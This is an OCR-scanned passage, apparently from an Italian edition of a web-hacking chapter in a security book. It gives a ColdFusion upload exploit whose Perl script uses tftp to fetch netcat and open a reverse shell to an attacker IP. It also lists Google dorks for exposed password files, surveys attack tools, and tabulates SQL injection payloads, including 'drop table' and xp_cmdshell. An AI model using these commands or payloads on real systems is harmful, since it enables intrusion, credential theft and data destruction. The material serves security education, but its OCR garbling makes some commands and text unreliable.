ma locale. Per sfruttare questa opportunità, applicate la procedura descritta di seguito. 


1. Create un file che, se utilizzato su un server Web remoto, esegua un coman- 
do locale. Noi, per esempio, preferiamo gli script Perl (quando sono dispo- 
nibili), che utilizziamo per creare un file, chiamato “test.pl”, in cui inseriamo 
le nostre righe di codice preferite. 


system("tftp -i 192.168.51.100 GET nc.exe"); 
system("nc -e cmd.exe 192.168.51.100 3000"); 


4 Ovviamente questo si può fare solo se è presente un interprete Perl sull'Appli- 
UA cation Server Cold Fusion. 


2. Fate puntare il vostro browser al seguente URL: 


http://192.168.51.101/cfdocs/expeval/openfile.cfm 


3. Inserite il vostro file nel campo Open File e fate clic su OK: 


pe 


OPEN FILE 


Specify the file to be loaded into the expression window 


d:\temp\test.pl 
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Dovrebbe comparire la seguente schermata: 


© Expression Calculator - Netscape 


T Bookmarks Zi Location: [htp://192 168.51.101/c1 


Use the form below to test Cold Fusion expressions. You can use any functions in 
your expressions. The evaluator doas not support CFML tags and array element 
assignments. Read HELP for more information on how to use the evaluator 
effectively 


system("tftp -i 192.168.5S1.100 GET nc.exe&Gnce -e 


4. Nel campo URL, sostituite il percorso D:\INETPUB\WWWROOT\cfdocsX 
expeval\test.pl con il nome e la posizione del file che elimina i file caricati: 
exprcalc.cfm. Dopo aver apportato le modifiche, l’URL diventa: 


http://192.168.51.191/cfdocs/expeval/ExprCalc.cfm?RequestTimeout= 
2000&0OpenFilePath=D:\INETPUB\WMWROOT\cfdocs\expeval\exprcalc.cfm 


5. Nella finestra viene visualizzato il contenuto del file exprcalc.cfm che vie- 
ne eliminato dal sistema. Ora tutti i file trasferiti con openfile.cfm riman- 
gono memorizzati sul sistema remoto. 

6. Rispedite il file test.pl sul sistema remoto, effettuando le operazioni de- 

scritte in precedenza. Una volta effettuato l'upload, il file test .pl rimane in 

attesa della chiamata. 


7. Eseguite il file test.pl richiamandolo con l'URL: 


http://192.168.51.101/cfdocs/expeval/test.pl 
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8. Se il server TFTP e il listener sono già in esecuzione, viene visualizzato il se- 
guente prompt “Administrator”; 


C:\>nc -1 -p 3000 
Microsoft(R) Windows NT(TM) 
(C) Copyright 1985-1996 Microsoft Corp. 


D:\INETPUB\WWROOT\cfdocs> 


DÌ Contromisure per Cold Fusion 


Ci sono due modi per evitare che vengano sfruttati i punti deboli di Cold Fusion: 
e climinare gli script interessati dal problema; 
e installare l'aggiornamento Macromedia per il problema di exprcalc.cfm, re- 


peribile su http://www.Macromedia.com/handlers/index.cfm?ID=8727& 
Method=Full. 


Scanner delle vulnerabilità dei server Web 


Questo bombardamento di attacchi per server Web vi ha reso alquanto sgomenti? 
Vi state chiedendo come potrete individuare così tanti problemi senza setacciare 
manualmente centinaia di server? Per fortuna, sono disponibili diversi tool di par- 
sing automatizzato dei server Web, che consentono di individuare tutte le nuove 
vulnerabilità che continua a essere il bersaglio della comunità degli hacker. Questi 
tipi di tool, comunemente chiamati scanner delle vulnerabilità Web, consentono di 
individuare decine di vulnerabilità ben note. Gli aggressori possono impiegare il 
loro tempo in modo più proficuo sfruttando le vulnerabilità individuate dai tool. Sa- 
rebbe meglio dire che potete utilizzare il vostro tempo in modo più proficuo nel 
tamponare questi problemi quando è possibile effettuare tali scansioni! 


Nikto 


Nikto è uno scanner di server Web in grado di effettuare test esaustivi contro server 
Web alla ricerca di un certo numero di vulnerabilità note. Esso può essere scaricato 
all'indirizzo http://www .cirt.net/code/nikto.shtml. Il database delle impronte 
delle vulnerabilità viene aggiornato di frequente con tutti gli ultimi punti deboli sco- 
perti recentemente. 

La Tabella 15.1 elenca i vantaggi e gli svantaggi di Nikto. 


Whisker 2.0 


Whisker è uno scanner delle vulnerabilità Web dotato di una serie impressionante 
di funzionalità. Esso può essere scaricato all'indirizzo http://prdownloads. sour - 
ceforge.net/whisker/whisker-2.0.tar.gz?download. La Tabella 15.2 elenca i 
vantaggi e gli svantaggi di Whisker. 
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Hacking delle applicazioni Web 


Con il termine “hacking delle applicazioni Web” si indicano gli attacchi alle applica- 
zioni stesse, in contrapposizione con gli attacchi al software del server Web su cui 
queste applicazioni vengono eseguite. L'hacking delle applicazioni Web richiede il 
ricorso a molte delle tecniche utilizzate nell’hacking dei server Web, compresi gli at- 
tacchi con validazione dell’input, gli attacchi crittografici, gli attacchi a sessione ecc. 
La differenza principale risiede nel fatto che in questo caso l'aggressore si concentra 
sul codice personalizzato dell’applicazione anziché sul software del server nella 
configurazione di default; pertanto, questo tipo di approccio richiede una pazienza 
maggiore e un certa abilità. In questo paragrafo, illustreremo alcuni too] e tecniche 
di hacking delle applicazioni Web. 


Tabella 15.1 Vantaggie svantaggi di Nikto 


Vantaggi Svantaggi 


Il database delle scansioni può essere aggior- 
nato con un semplice comando. 

Il database delle scansioni è nel formato 
CVS. Potete aggiungervi facilmente scansioni 
personalizzate. 

Supporto dell'SSL 


Supporta l'autenticazione di base degli host 
HTTP. 


Supporto proxy con autenticazione, 

Cattura dei cookie provenienti dal server Web. 
Supporta l'output di nnap come input. 
Supporta diverse tecniche di elusione dell’IDS. 


Non accetta intervalli IP come input. 
Non supporta i file dei sistemi bersaglio. 
Non effettua l'autenticazione NTLM. 


Non è in grado di effettuare verifiche con i 
cookie. 


Tabella 15.2 Vantaggi e svantaggi di Wisker 


Vantaggi 


Supporto SSL, 

Supporta l'autenticazione di base degli host 
HTTP. 

Supporto proxy con autenticazione. 

Dotato di un crawler incorporato. 

Potete predefinire la directory CGI impostan- 
do anziché il valore di default “/cgi-bin” un 
valore di vostra scelta o un insieme di per- 
corsi CGI conosciuti. 

Prima di verificare la presenza di vulnerabili- 
tà, Whisker verificherà che la directory CGI 
esista e che esista il CGI, riducendo in questo 
modo il numero di falsi risultati positivi. 


Svantaggi 


Non è in grado di accettare come input un fi- 
le di un host di destinazione. Whisker v1.1 è 
dotato di questa opzione. 


Non effettua l’autenticazione NTLM. 


Ricerca di applicazioni Web vulnerabili con Google 


I motori di ricerca indicizzano un numero notevole di pagine Web e di altre risorse. 
Gli hacker possono utilizzare questi motori per sferrare attacchi anonimi, trovare fa- 
cili vittime e acquisire le conoscenze necessarie per realizzare un potente attacco 
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contro una rete. I motori di ricerca risultano pericolosi principalmente perché gli 
utenti sono poco diligenti; inoltre essi possono aiutare gli hacker a evitare l’identifi- 
cazione. Con i motori di ricerca, l’identificazione di bersagli ideali avviene quasi 
senza sforzo. Di seguito sono elencati alcuni hack comuni realizzati con http: 
//www.google.com (il nostro motore preferito, ma potete utilizzare qualsiasi altro 
motore, purché supporti le stesse funzionalità di Google). 

Per individuare le directory non protette /admin, /password, /mail e i rispettivi con- 
tenuti, inserite le parole chiave seguenti all'indirizzo http://Www.google.com: 


e ‘“Indexof/admin”; 
e “Indexof/password”; 

e “Indexof /mail”; 

e “Index of /” +banques +filetype:xls (per la Francia); 
e “Indexof/” +passwd; 

e “Index of/” password.txt. 


Per trovare applicazioni che suggeriscono password impostate non correttamente, 
digitate le parole seguenti all'indirizzo http://ww.google.com (molte di queste 
enumerano utenti, forniscono suggerimenti per le password o recapitano password 
di account a un indirizzo di posta elettronica da voi specificato!): 


e password hint; 

e password hint —email; 

e show password hint —email; 
e  filetype:htaccess user. 


Per individuare server Web IIS/Apache con FrontPage installato, digitate le parole 
seguenti (se eseguite i file delle password criptate tramite un cracker delle pass- 
word potrete accedere in pochi minuti!): 


e administrators.pwd index; 

e authors.pwd index; 

e service.pwd index; 

e allinurl_ vti bin shtml.exe. 

Per trovare la pagina di analisi del traffico MRTG per i siti Web, digitate invece: 
e inurlmitg. 


Per accedere a file global.asa(x) non protetti o acquisire informazioni interessanti su 
.NET, digitate: 

e filetype:config web (finds web.config); 

e global.asax index (finds globalasax or global.asa); 

Per individuare server OWA (Oxtlook Web Access) configurati in modo non corret- 
to, digitate quanto segue: 

e inurliexchange inurl:finduser inurl:root 

Servitevi della vostra immaginazione: le possibilità sono infinite. 


Analisi del Web 


Sembra che Abramo Lincoln una volta abbia detto: “Se avessi a disposizione otto 
ore per abbattere un albero, ne passerei sei ad affilare l’ascia”. Un aggressore ine- 
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sperto si prenderà tutto il tempo necessario per familiarizzare con l'applicazione. In 
particolare, scaricherà l’intero contenuto del sito Web che intende violare e cerche- 
rà i frutti maturi sui rami più bassi, quali le informazioni sui percorsi locali, i nomi 
dei server back-end e gli indirizzi IP, le stringhe di query SQL con relative pass- 
word, i commenti contenenti informazioni utili e altri dati riservati, nelle posizioni 
seguenti: 


e pagine statiche e dinamiche; 
e file include e altri file di supporto; 
e codice sorgente. 


Strumenti di analisi del Web 


Qual è il modo migliore per ottenere queste informazioni? Il recupero dei contenuti 
di un intero sito Web è per sua natura un'attività tediosa e ripetitiva; esso però si 
presta a essere automatizzato. Fortunatamente, sono disponibili diversi tool di buon 
livello che consentono di effettuare l’analisi del Web (Web crawling). Di seguito 
sono presentati due esempi. 


wget 


wget è un package di software gratuito che consente di recuperare file utilizzando 
l'HTTP, l’HTTPS e l’FTP, i due protocolli più utilizzati su Internet. Si tratta di un tool 
a riga di comando non interattivo, per cui può essere facilmente richiamato da 
script, cron job e terminali privi di XSupport. wget può essere scaricato all’indirizzo 
http://ww.gnu.org/software/wget/wget.html. Ecco un semplice esempio del 
suo utilizzo: 


C:\>wget -P chits -1 2 http://www.google.com 
--20:39:46-- http://ww.google.com:80/ 

=> ‘chits/index.html' 
Connecting to www.google.com:809... connected! 
HTTP request sent, awaiting response... 200 OK 
Length: 2,532 [text/html] 


0K -> .. [100%] 


DO 
20:39:46 (2,41 MB/s) - ’chits/index.html' saved [2532/2532] 


Offline Explorer Pro 


Offline Explorer Pro, mostrato nella Figura 15.1, è un'applicazione Win32 commer- 
ciale che consente all’aggressore di scaricare un numero illimitato di siti Web e FTP 
da visualizzare, modificare ed esplorare in un secondo tempo in modalità offline. 
Esso supporta anche i protocolli HTTPS, RTSP e MMS; inoltre supporta l’autentica- 
zione NTLM. Offline Explorer Pro può essere scaricato all'indirizzo http: //ww.me- 
taproducts.com/mp/mpProducts_Downloads_ Current.asp. 


Valutazione delle applicazioni Web 


Dopo aver esplorato e analizzato scrupolosamente il contenuto dell’applicazione 
bersaglio, generalmente l'aggressore passerà a un'indagine approfondita delle prin- 
cipali caratteristiche dell’applicazione. Lo scopo finale di questa attività è compren- 
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Project Properties 
Category: 


Project | Advanced - Passwords Fasswords used foi protected web sites 
3 File Filters Ù 


MI Text Protected sites and site areas 
da ©® Use this user name and password 
MW) Audio (® tologonto protected Web and FTP sites 
WI} Archive 
Mi User Defined O in HTML forms 
(2) Other 
G URL Filters 
Protocol 
Server 
Dincion DI REA È da 
Filename © Prompt for user name and password on protected sites 
eprseancai è | O Ignore protected sites and continue downloading 
Link Translation 
Scheduling I © Stop download if site is protected 


Passwords diri ili iii mit licia 


File Copies Note: for NTLM authorization, enter DOMAINUser in the user name field. 


Figura 15.1 


Opzioni di autenticazioni disponibili in Offline Explorer Pro. L'autenticazione NTLM è eseguita 
automaticamente se si utilizza la sintassi DOMAIN\username. 


dere a fondo l'architettura e il progetto dell’applicazione, identificare eventuali pos- 
sibili talloni di Achille e suddividere logicamente l'applicazione in qualsiasi modo 
possibile. 

Per raggiungere questi obiettivi, ogni componente importante dell’applicazione sarà 
esaminato sia nell'ottica della mancata autenticazione sia in quella dell’autenticazio- 
ne, se sono note le credenziali opportune (per esempio, il sito può consentire la re- 
gistrazione libera di nuovi utenti, o l'aggressore ha già acquisito le credenziali 
esplorando il sito). Gli attacchi alle applicazioni Web sono generalmente focalizzati 
sulle caratteristiche seguenti: 

@ autenticazione; 

@ gestione delle sessioni; 

e interazione con il database; 

e validazione generica dell’input. 

Nei paragrafi seguenti, vedremo come analizzare ciascuna di queste caratteristiche, 
spiegando anche quali sono i tool e le tecniche migliori da utilizzare. 


Tool per la valutazione delle applicazioni Web 


Molti dei difetti più gravi delle applicazioni Web non possono essere analizzati sen- 
za il tool opportuno. Pertanto inizieremo a enumerare i tool comunemente utilizzati 
per effettuare l’hacking delle applicazioni Web. 
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Achilles 


Achilles, mostrato nella Figura 15.2, è un server proxy che si comporta come un 
Man-In-The-Middle nel corso di una sessione HTTP. Achilles intercetta i dati di una 
sessione HTTP in entrambe le direzioni e consente all'utente di modificare i dati pri- 
ma della loro trasmissione; inoltre supporta le transazioni SSL (Secure Sockets 
Layer). Ecco alcune delle sue funzionalità: porte di ascolto configurabili e valori di 
timeout, disponibilità di un buffer aggiuntivo per effettuare attacchi basati sull’over- 
flow del buffer, ricalcolo della lunghezza del contenuto effettuato affinché esso cor- 
risponda ai dati modificati e altro ancora. Achilles viene eseguito su Win32. Può es- 
sere scaricato all’indirizzo http://www.digizen-security.com/downloads.html. 


Achilles 0.27 


0 OK 
Date: Wed. 01 Jan 2003 21:48:42 GMT 
Server: WebSTAR 
Connection: close 
Content-Type: text/htm! 


<title>Foundstone - Know Vulnerabillties</title> 
<meta http-equiv="'Content-Type" content="text/hitml; charset=iso-8959-1'> 
<meta name="description" cantent="Foundstone - The premiere provider of enterprise security, computer forensics, incident response, 
penetration testing. vulnerability management and other security services." 
<meta name='keywords" content="computer forensics, enterprise security, ethical hacking, FoundScan, FoundSecure, foundstone, hacker. 
incident response, Information security, internet security, network security, penetration testing, security audit, security services, security 
sting, security training, ultimate hacking, hacking exposed, vulnerability assessment vulnerability management, security vulnerabilities"> 
KNink rel="stylesheet* href="aundstone.css" type="textfcss"> 
«META name="Expires" content="Tue, 01 Jun 1999 00:26:00 GMT" 
<script language="JavaScript'> 
KH 
inction MM_preloadimagesi) { {#v3.0 
var d=document; if[d.images]{ iff!d.MM_p) d.MM_p=new Arrayf): 
vat i,j=d,MM_p.length,a=MM_preloadimages.arguments; forfi=0; i<a.length: i++] 
if fafi].index0f(*#")!=0){ d.MM_p[j]=ncw Image; d.MM_p[j++].src=afî:}} 
) 


var ix. a=document.MM_sr: forfi=0;a&&|<a.lengih&&[x=a[i]]&&x.oSrc:i+4) x.src=x.0Src; 


ae MM_swaplmgRestore]) ( /#v3.0 


Status: [Running 


Figura 15.2 
Achilles in azione, mentre intercetta richieste e risposte HTTP. 


WebSleuth 


WebsSleuth è un tool di verifica della sicurezza delle applicazioni Web incorporato 
in un browser. È disponibile nelle versioni per Win32 e per Linux, all'indirizzo http 
://ww.cgisecurity.com/websleuth/. WebSleuth consente tra l’altro di modifica- 
re “al volo” le richieste HTTP e HTML in tempo reale. Le funzionalità maggiormente 
utili di WebSleuth sono i suoi plugin, che comprendono un cracker di tipo forza 
bruta basato su ID sessioni HTTP/Cookie, un tester per SQL injection e un cracker 
di tipo forza bruta per HTTP. Le numerose opzioni di configurazione e la palette dei 
plug-in di WebSleuth sono mostrate nella Figura 15.3. 
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- General Preferences — + Navigation Options — — ——— » Security Options [Internet Zone] — 
| | 

| Load Plugins on Stat |! "> Anabze CGI Links OnMouseOver || 19 Active Scrping [AMVRREV 
| 


| RW Show Splash Screen pusb) 


I Analyze CGI Links OnNavigate || IT ActiveX 


| MY Source Syntax Mibhlightino | | l 
| TT Analyze POST Data OnSubmit | R Session Cookies | Mesi || 


W Dirty Source Prompt | | 
3 ag || J° Prompt before Navigate ‘| ÎY Userdata Persistance perde | 


T” Block Selected Servers |P? Persistant Cookies Standard E Options 


| [ LogActions 

| | 
| TT Cookie On Top il 
TT Use Source Fie (a T- Block Popups || 7 File Downloads re 


È i Oplione — 


Select Proxy co Current Proxy = 5000 
I Active Manage ProwList | Set Proxy Prow | 


Raw tito pesta, 


http://www. foundstone.com/knowle WinApi: Https RawReq 
http://www.foundstone,com/client_i \WinApi: Edit Cookie 
| [http://www .foundstone.com/contaci Cher Conversion 
‘|http://www.foundstone, com/searchi Orginal RawReq 
È http://ww.w.foundstone.com/compati Grab Sequential Cookies 
\|http://www,foundstone.com/ BruteForce Basic Auth 
Di uo ://www.foundstone.cam/index, h BruteForce SessioniD/Cookie 
Http PutiDelete 


Figura 15.3 
Scheda delle opzioni di VVebSleuth con la palette dei plug-in attiva. 


Uno dei plug-in più ingegnosi di WebSleuth è Sessions Package, scritto da David 
Endler. Il plug-in Sessions, mostrato nella Figura 15.4, può essere scaricato dall’URL 
principale di WebSleuth. Questo software è utile per effettuare l’auditing di sessioni 
in tre modi diversi. In primo luogo, funziona come dispositivo di cattura cookie se- 
quenziale, In questo modo aiuta a stabilire la relativa casualità dei potenziali ID di 
sessione che possono essere generati in sequenza. In secondo luogo, si comporta 
come un cracker di tipo forza bruta per l'autenticazione di base. Questa funzionalità 
è utile per verificare la solidità delle password dell’applicazione. Infine, funziona 
come cracker di tipo forza bruta degli ID di cookie/sessioni. Questa funzione è utile 
per carpire con un metodo a forza bruta ID di sessione o cookie generati da un’ap- 
plicazione. 


SPIKE Proxy 


SPIKE Proxy è un tool di valutazione delle applicazioni Web basato su Python e 
OpenSSL, che funziona da proxy HTTP e HTTPS. Esso consente allo sviluppatore 
Web o al collaudatore delle applicazioni Web di accedere a basso livello all'intera 
interfaccia dell'applicazione Web, mettendo al tempo stesso a disposizione una mi- 
riade di tool e tecniche automatizzate per l'individuazione di problemi comuni. I 
tool automatizzati comprendono SQL Injector, Web Site Crawler, Login Form Brute 
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= Sessions Brute-Forcer 


Sample Sequential Cookies: — 
Brute Force Basic Authentication 


@ Justlook for non HTTP 404 header 
(200, 301,302, etc.) 


Look for non 404 header AND n | - 
specific text in the response: 


TT Include Time in Output? Stop All'Actions | 
PREF=ID=20a2d483065406d9;TM=1041467397:LM= Toi 
1041467397:S=K_14pIszUSZRNXvb; expires=Sun, 17-Jan-2038 
19:14:07GNT; path=/; domain=.google.com 

IHTTP/1.1 200 0K 

Content-Length: 2486 

Connection: Close 

Server: GWS/2.0 

Date: Thu, 02 Jan 2003 00:31:24 GNT 

Content-Type: text/html 


Figura 15.4 


Il plug-in Session di WebSleuth cattura i cookie da un sito Web 
e li sottopone a un attacco di tipo forza bruta. 


Forcer, Automated Overflow Detection e altri ancora. SPIKE proxy è disponibile 
nelle versioni per Win32 e Linux e può essere scaricato all'indirizzo http:// 
www.immunitysec.com/spike.html. Tenete presente che dovrete scaricare ben 13 
MB se non avete già Python e OpenSSL installati sul vostro sistema. Si sono inoltre 
verificati problemi relativi all'esecuzione del componente OpenSSL su Windows XP, 
che si sono tradotti nel mancato funzionamento dell’intero programma. 


WebProxy 


WebProxy 1.0 è un tool di verifica della sicurezza dei browser, basato su Java2, da 
utilizzare nell’auditing dei siti Web. Installato come proxy per il vostro browser sulla 
porta 5111 per l’HTTP e sulla 5112 per l’HTTPS, WebProxy vi consente di intercetta- 
re, modificare, registrare e ripresentare richieste sia HTTP che HTTPS. Tra le funzio- 
nalità di editing è disponibile il parsing dei parametri delle query, degli header delle 
richieste e dei parametri POST, oltre che la modifica dei cookie. WebProxy può es- 
sere utilizzato per l'SQL injection, la modifica dei cookie, il controllo dei parametti, 
o semplicemente il monitoraggio delle richieste. WebProxy può essere scaricato 
all'indirizzo http://ww.atstake.com/research/tool/index.html nelle versioni 
per Win32, Linux x86 e Solaris Sparc o per x86. La Figura 15.5 mostra la finestra dei 
comandi di WebProxy 1.0, in cui il proxy viene lanciato, e una finestra del browser 
in secondo piano in cui viene effettuata l’analisi di un sito Web. Ricordatevi di im- 
postare il proxy del browser su HTTP:5111 e HTTPS:5112 una volta che siete riusciti 
a lanciare WebProxy. Dopo aver configurato il proxy, potete collegarvi a http: 
/ [webproxy per visualizzare le impostazioni di configurazione e servirvi delle utili- 
ty/plugin. Non dimenticate di ripristinare le impostazioni del proxy del vostro 
browser quando avete finito di utilizzare WebProxy, in modo da riprendere la navi- 
gazione normale su Internet. 

Mentre scriviamo, sembra che non sia più possibile scaricare gratuitamente Web- 
Proxy 1.0. Attualmente @Stake pubblicizza Web Proxy versione 2.0 con prezzi che 
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28899) — st http_S1 *n Glient request to mw.foundstone.com:99 C18:84:43/01-J) 


Do om ra FARRRS AIDA MR rente pe swf WTIP/1.8 
Di 


ti” “fede isd-since: Fri. 20 Dec 2092 22:41:11 GM 
I[f-None-Mate "£5446-2bbc-3e839c87" 
io ict “hozilla/4, @ (compatible; MSIE 6.9; Windows NT 5.1; .NET CLR 1.0.3765 


st: www.foundstons.com 
onnectiaa: close 


1 te" pr MARiLia 
lm, 003 02:04:44 GMT 
Meta” 


cetioni close 
"£5446-2bhc -JeB39c87" 


Figura 15.5 
Il plug-in Request Editor di WebProxy consente di modificare le richieste HTTP e HTTPS. 


variano in base al tipo di licenza e al supporto tecnico fornito. Sulla base delle fun- 
zionalità che abbiamo visto nella versione 1.0, consigliamo di provare alcuni degli 
altri tool gratuiti descritti in questo capitolo, prima di aderire a questa offerta, 0 
quanto meno richiedere un periodo di prova gratuito prima di passare a queste no- 
vità della versione 2. 


N Perutilizzare Web Proxy, dovete procurarvi e installare JRE Java 2 Runtime 
Rg Environment), versione 1.4 o successiva. Attualmente, @Stake offre JRE 
1.4.1 con WebProxy 2.0. In alternativa, potete scaricare l’ultima versione di 

JRE all'indirizzo http://java.sun.com. 


Form Scalpel 


Form Scalpel è stato studiato per valutare la resistenza di un sito Web agli attacchi a 
form basati sull’HTML. Questo tool estrae automaticamente i form da una determi- 
nata pagina Web e quindi estrae tutti i campi univoci per consentirne la modifica e 
la manipolazione, semplificando il compito di formulare attacchi dettagliati di vali- 
dazione dell'input GET e POST contro i form HTML. Form Scalpel supporta connes- 
sioni HTTP e HTTPS e funziona sui server proxy. È un’applicazione Win32 che può 
essere scaricata all'indirizzo http://ww.ugc-labs.co.uk/tools/formscalpel. 

Nella Figura 15.6 vediamo Form Scalpel in azione. In questo semplice esempio, 
Form Scalpel è stato studiato per valutare la resistenza di un sito Web agli attacchi a 
form basati sull’HTML. Questo tool estrae automaticamente i form da una determi- 
nata pagina Web e quindi estrae tutti i campi univoci per consentirne la modifica e 
la manipolazione, semplificando il compito di formulare attacchi dettagliati di vali- 
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dazione dell'input GET e POST contro i form HTML. Form Scalpel supporta connes- 
sioni HTTP e HTTPS e funziona sui server proxy. È un’applicazione Win32 che può 
essere scaricata da http://www.ugc-labs.co.uk/tools/formscalpel. 

Nella Figura 15.6 vediamo Form Scalpel in azione. In questo semplice esempio, na- 
vigando abbiamo raggiunto una pagina Web che utilizza i form e analizzato detta- 
gliatamente ciascun form individuato, utilizzando la scheda Form Details di From 
Scalpel (non mostrata in figura). La scheda Forms Details rivela l’esistenza di un sin- 
golo form, con quattro possibili input (tre dei quali sono nascosti). L'unico non na- 
scosto si chiama “q”. In seguito, sulla scheda GEY/POST Tuner mostrata nella Figura 
15.6, abbiamo inserito il valore “foundstone” in corrispondenza dell’input “q”. Gra- 
zie a Form Scalpel, che ci ha consentito di estrarre in modo diretto i parametri del 
form, l’analisi dell'input nei confronti di questo sito è un gioco da ragazzi. 


EE Form Scalpel 
Ele View Options Help 
URL: Ihttp://www. google com/ 
INBOUND: Successful GET! OUTBOUND: Successful GETI 
GET/POST Tuner 
© Use Form Editor Results 
ActionUAL: — [http:/www.google.com/seatth (/ 
Data/Query Fields: [himentie=UTF-9toe=UTF-Sba=tbtnG=GooglesSearth “TT 
(TA 


© Use Browser Reference 


C Send File ot Binary Data 


| A 
File Path: fi Age dl 7__ I 


il 
ì 
I 
| 
| 


| (_Castom Edito 


GET/POST Send Data — 

GET 

Action URL: {hp /iwww.google.com/search 

Post Data: [himentie=U TF-Stoe=UTF-Gta-IEt MAMME LbinG =Gioogle+Search | 
"il 


7 Send Cookie: [PREF-ID=17b94ef81e268013:TM=1041484419:LM=1041484419:S=Tv207ig20_KyKaz_ 


| IT SendReferer 


Figura 15.6 


Utilizzo di Form Scalpel per testare la validazione dell'input: in questo caso abbiamo impostato 
manualmente a “foundstone"' il valore "q". 


Hacking del Web 585 


NTOMax 


NTOMax è un tool a script per test di sollecitazione dei server, scaricabile all’indiriz- 
zo http://www. foundstone.com/knowledge/free_tools.html. Questo tool accet- 
ta come input un file di testo ed esegue un server sottoponendolo a una serie di test 
basati su tale input. Esso consente di individuare overflow del buffer di punti DOS 
in un server. Ecco un esempio di file script NTOMax: 


host:192.168.09.1,22,100,500,4000,250,0,2,true,true,true,false 
lc:GET /login.php?* HTTP/1.09 


Potete poi eseguire questo script contro un server simile, inviando i risultati al file 
results.txt (attenzione, le parentesi angolari sono necessarie!): 


C:\>ntomax /s < script.txt > results.txt 


WASAT 


WASAT (Web Autbentication Security Analysis Tool), mostrato nella Figura 15.7, è 
un efficiente quanto piccolo tool GUI in grado di valutare la sicurezza dei sistemi di 
autenticazione di base che utilizzano i form. WASAT è in grado di realizzare attacchi 
a dizionario e a forza bruta con vari gradi di complessità contro un sito Web. Esso 
può essere scaricato all'indirizzo http://ww.instisec.com/publico/descargas 
/default.en.asp?id=2. 


Configuration 


Target | Basic Forms | Passwords | 


UserID: jtest Password ID: [pass Method:[GET “] 


Additional arguments: [URI=http://goodsite. org 
Referer: | UserAgent: | 


Cookie: |auth=917392874 


IF Search for Sting 00 


Figura 15.7 
Opzioni di configurazione dell'autenticazione basata su form di WASAT. 


SPIKE 


SPIKE è un kit di “fuzzing” di Immunity Security, Inc. Può essere scaricato all’indi- 
rizzo http://ww.immunitysec.com/spike.html. “Fuzzing” è un termine generico 
utilizzato per indicare l'invio di dati casuali a un’interfaccia (non importa se costitui- 
ta da un’API di programmazione o un Web form) ed esaminare i risultati indivi- 
duando eventuali segni di potenziali vulnerabilità. Esso include un tool a forza bru- 


586 Capitolo 15 


ta che agisce sull’autenticazione NTLM dei server Web, in grado di provare circa 
nove parole al secondo. Per effettuare un attacco a forza bruta su una connessione 
SSL con SPIKE, dovete utilizzare un proxy SSL quale stunnel (http://www. stunnel 
.0rg/) o openssl (http://www.openssl.org/). 


APS NTLM 


L’APS (Authorization Proxy Server) NTLM è un servizio configurabile in grado di 
funzionare come proxy del protocollo di autenticazione proprietario NTLM. Esso 
può essere scaricato all'indirizzo http://www.geocities.com/rozmanov/ntlm/. 
Per eseguirlo, vi occorrerà anche un opportuno ambiente Python. Questo tool può 
rivelarsi molto utile quando un'applicazione bersaglio utilizza l'autenticazione 
NTLM per proteggere le pagine. Poiché l'autenticazione NTLM è supportata di de- 
fault su IIS, la maggior parte delle applicazioni costruite su una piattaforma Micro- 
soft si serve di questo meccanismo di autenticazione. 


Py APS può funzionare come proxy per i tool di scansione citati in “Scanner 
go delle vulnerabilità dei server Web”, nella prima parte di questo capitolo. 


Vulnerabilità comuni delle applicazioni Web 


Che cosa cerca dunque un tipico aggressore quando valuta un'applicazione Web? 
Di solito i punti deboli sono molti; tuttavia la nostra esperienza pluriennale, matura- 
ta attraverso la valutazione di centinaia di applicazioni Web, ci dice che gran parte 
di essi rientra in alcune categorie, di cui discuteremo in questo paragrafo. 


® SQL injection 


Diffusione: 9 
Semplicità: 5 
Impatto: 8 
Fattore di rischio: 7 


Gran parte delle applicazioni Web moderne sono state basate su contenuti dinamici 
allo scopo di renderle altrettanto accattivanti dei tradizionali programmi desktop a 
finestre. Questa dinamicità viene di solito ottenuta recuperando dati aggiornati 
estratti da un database. L'SQL è una delle piattaforme più diffuse per gli archivi di 
dati del Web e molte applicazioni Web si basano interamente su script front-end 
che si limitano a interrogare un database SQL, situato sul server Web stesso o su un 
sistema back-end separato. Uno degli attacchi più insidiosi che possono essere sfer- 
rati contro applicazioni Web sfrutta il dirottamento delle query utilizzate dagli stessi 
script front-end per ottenere il controllo dell'applicazione o dei suoi dati. Uno dei 
meccanismi più efficienti utilizzati per raggiungere questo obiettivo è una tecnica 
chiamata SOL injection. 

L'SQL injection consiste nell'inserimento di query Transact SQL grezze in un’appli- 
cazione, per compiere un’azione imprevista. Spesso è sufficiente modificare le que- 
ry esistenti per ottenere gli stessi risultati: ‘Trransact SQL può essere facilmente mani- 
polato inserendo anche un singolo carattere in un punto scelto oculatamente, affin- 
ché l’intera query si comporti in modo decisamente improprio. Tra i caratteri gene- 
ralmente utilizzati per questi attacchi di validazione dell’input vi sono il carattere 
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backtick ©), il doppio trattino (--) e il punto e virgola (:); tutti questi caratteri hanno 
un significato speciale in Transact SQL. 

Che cosa può fare un abile hacker con una query SQL usurpata? Tanto per comin- 
ciare, anche un principiante può accedere senza autorizzazione ad alcuni dati. Con 
tecniche più raffinate, sarà possibile eludere l'autenticazione o addirittura assumere 
il controllo completo del server Web o di un sistema SQL back-end. Vediamo alcuni 
esempi. 


Esempi di attacchi di tipo SQL injection 


Per vedere se l'applicazione è vulnerabile ad attacchi di tipo SQL injection, provate 
a digitare nei campi del form quanto elencato nella tabella seguente. 


Elusione dell’autenticazione 


Autenticazione senza credenziali Nome utente: ' OR "=' 
Password: ' OR "=' 

Autenticazione con il solo nome utente Nome utente: admin' - - 

Autenticazione come primo utente nella ta- Nome utente: ' or 1=1-- 

bella users 

Autenticazione come utente fittizio Nome utente: ' union select 1, 'user', 
‘passwd' 1-- 

Effetti distruttivi 

Eliminazione della tabella di un database Nome utente: ';drop table users-- 

Chiusura del database in modalità remota Nome utente: aaaaaaaaaaaaaaa' 


Password: 'j; shutdown - - 
Esecuzione di chiamate di funzioni e procedure memorizzate 


Esecuzione di xp_cmdshell per ottenere un http://localhost/script?0';EXEC+ 


listato delle directory master. .xp_cmdshell+'dir';-- 

Esecuzione di xp_servicecontrol per ma-  http://localhost/a script?0@';EXEC+ 

nipolare i servizi master..xp_servicecontrol+'start',+ 
'server';-- 


Non tutti gli esempi di sintassi appena mostrati funzionano su qualsiasi implementa- 
zione di database proprietaria. Le informazioni elencate nella tabella seguente indi- 
cano se alcune delle tecniche appena descritte funzioneranno o meno su determi- 
nate piattaforme di database. 


Informazioni specifiche del database 


MySQL Oracle —DB2 Postgre —MS SQL 
UNION possibile Sì Sì Sì Sì Sì 
Sottoselezioni possibili No Sì Sì Sì Sì 
Istruzioni multiple No (general- No No Sì Sì 

mente) 
Procedure di default. — Molte - i Molte 
